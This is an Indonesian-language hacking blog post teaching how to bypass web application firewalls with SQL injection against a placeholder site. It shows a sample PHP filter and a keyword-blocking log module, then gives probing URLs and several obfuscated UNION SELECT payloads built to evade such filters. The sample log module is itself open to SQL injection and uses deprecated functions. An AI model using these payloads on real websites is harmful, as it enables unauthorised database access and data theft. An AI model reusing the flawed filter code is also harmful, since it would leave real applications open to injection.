Tuesday, April 1, 2014

WAF - SQL Injection

Assalamualaikum Wr Wb ..
Jumpa lagi bersama ./V404 hhehe

Kali ini saya akan memberikan tutorial tentang WAF :)
langsung simak yaa...

Tehnik nya hampir sama sperti SQL injection pada tutorial sebelumnya..
http://bl4cknote.blogspot.com/2014/03/hacking-website-dengan-sql-injection.html

WAF itu (Web Application Firewall) dimana WAF itu dipasang sebagai FIREWALL security web untuk keamanan umum...
Rata2 web yang udah dipasang WAF itu kebal sama SQL Injection yang basic (dasar) atau sql injection dengan statement error ( ' ) atau ( /** )

WAF itu kaya gimana sih ?
WAF itu seperti FILTER :P
:v bingung aku jelasinnya, wkwkwkkwkw =P

Tapi kalo untuk contohnya sih,
WAF itu modulenya kaya gini (  )

Code:
Anti MySQL Injection
$_GET = array_map('trim', $_GET);
$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
$_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);
Untuk contoh module log nya ..

Code:
Log Error / Aktifitas WAF

$locatie = $_SERVER['REQUEST_URI'];
$array = Array();
$array[] = "mysql";
$array[] = "query";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "<script>";
$array[] = "</script>";
$array = Array();
$array[] = "mysql";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "INSERT";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "UPDATE";
$array[] = "COOKIE";
$array[] = "FILES";
$array[] = "POST";
$array[] = "REQUEST";
$array[] = "SERVER";
$array[] = "INSERT";
$array[] = "%40";
$array[] = "%20";
$array[] = "";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "WHERE";
$array[] = "VALUES";
$array[] = "SELECT";
$array[] = "FROM";
$array[] = "exit";
$array[] = "'";
$array[] = '"';
$array[] = ",";
$array[] = "`";
$array[] = "echo";
foreach($array As $posinject) {
if(eregi($posinject,$locatie)) {
$time = 'NOW()';
mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());
header("location: namafile.php");
exit();
}
}
yah seperti itulah contoh module script WAF nya yang aq tau
kalo mumet baca kodenya :3
:v lanjutin dehh kalo blajar =))
nanggung kalo blajar setengah2
wkwkwkkwkwkwkwk :v
lanjut next step :3


Ciri2 Web Tersebut dilindungi WAF.

web tersebut dilindungi waf terlihat dari errornya
contoh :

Contoh 1 :
www.namawebsite.com/test.php?id=27'

Contoh 2 :
www.namawebsite.com/test.php?id=27 order by 1,2,3,4,5,6--

Contoh 3 :
www.namawebsite.com/test.php?id=27 union select all 1,2,3,4,5,6+from information_schema.tables+where table_schema=database()--

"Muncul 403 Forbidden, Not Acceptable, dsb ...
____________________________________________
Bypass WAF

Tehnik bypass WAF macem2, tergantung kreatifitas masing2 untuk membuat symbol2 atau syntak aneh2 yang berhubungan ama injeksi dari mysql

symbol2 yang digunakan dalam tehnik WAF tuh sih beragam
kaya :
Code:
/**/  , () , # , -- , +--+ , --+- , -- - , , %20 , / , // , <

yang paling sering dipake tuh yang /**/ , () , --

nahh, sekarang waktunya nerangin
( maap yah om2 tante2 ilmu copas dari google :3 wkwkkwwk :v )

PERHATIKAN UNION SELECT NYA ADA VARIASI NYA KAN :P
itu bertujuan untuk melewati FILTER WAF :)

contoh penggunaan waf :
Code:
Contoh 1
www.namawebsite.com/test.php?id=-27+/*!union*/+select+1,2,3--

Contoh 2
www.namawebsite.com/test.php?id=-27+/*!union*/+/*!select*/+1,2,3--

Contoh 3
www.namawebsite.com/test.php?id=-27/*union*/union/*select*/select+1,2,3/**

Contoh 4
www.namawebsite.com/test.php?id=-27/*uni Z on*/union/*sel Y ect*/select+1,2,3--

Contoh 5
www.namawebsite.com/test.php?id=-27+uni/**/on+se/**/lec/**/t+al/**/l+1,2,3--

Semoga anda bisa memahami nya :)
Sekian dari saya , Terimakasih

I love Watanabe Mayu ( Mayuyu - AKB48 ) :) :*

Content Creator  : ./V404
Source : Google.com

0 comments:

Post a Comment